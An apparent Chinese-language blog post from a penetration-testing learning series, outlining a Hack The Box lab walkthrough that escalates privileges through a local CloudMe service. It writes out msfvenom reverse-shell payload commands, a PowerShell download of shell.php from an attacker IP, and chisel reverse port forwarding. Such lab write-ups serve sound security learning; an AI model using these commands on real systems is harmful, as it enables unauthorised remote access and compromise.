iT邦幫忙

2021 iThome 鐵人賽

DAY 23
1

Recon

Exploit

  • 試用 Exploit
  • 準備另外一個 reverse shell
  • 確認 Systeminfo
  • 取 Userflag

提權

  • 確認 Defender 有開
  • 產 Shell
    • msfvenom -p php/reverse_php LHOST=10.10.16.35 LPORT=7877 -f raw > shell.php
    • powershell -c "wget http://10.10.16.35/shell.php -outFile shell.php"
  • 亂逛系統
  • 觀察開的 Port
    • netstat -ano -p tcp
  • 觀察執行中的 Process
    • tasklist
  • 發現 Downloads 資料夾有 CloudMe_1122.exe
  • 觀察開的 Port
    • 8888 但他只綁 127.0.0.1

Exploit

  • 本地端執行
    • ./chisel server -p 9999 --reverse
  • 遠端執行
    • chisel.exe client 10.10.16.35:9999 R:8888:127.0.0.1:8888
    • 把 Port 轉回 127.0.0.1:8888
  • 收封包
  • 使用 Exploit
  • 修改 shell code
    • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
  • 收 Reverse shell
  • 取得 Root flag

上一篇
[Day22] HTB Blue
下一篇
[Day24] HTB Devel
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言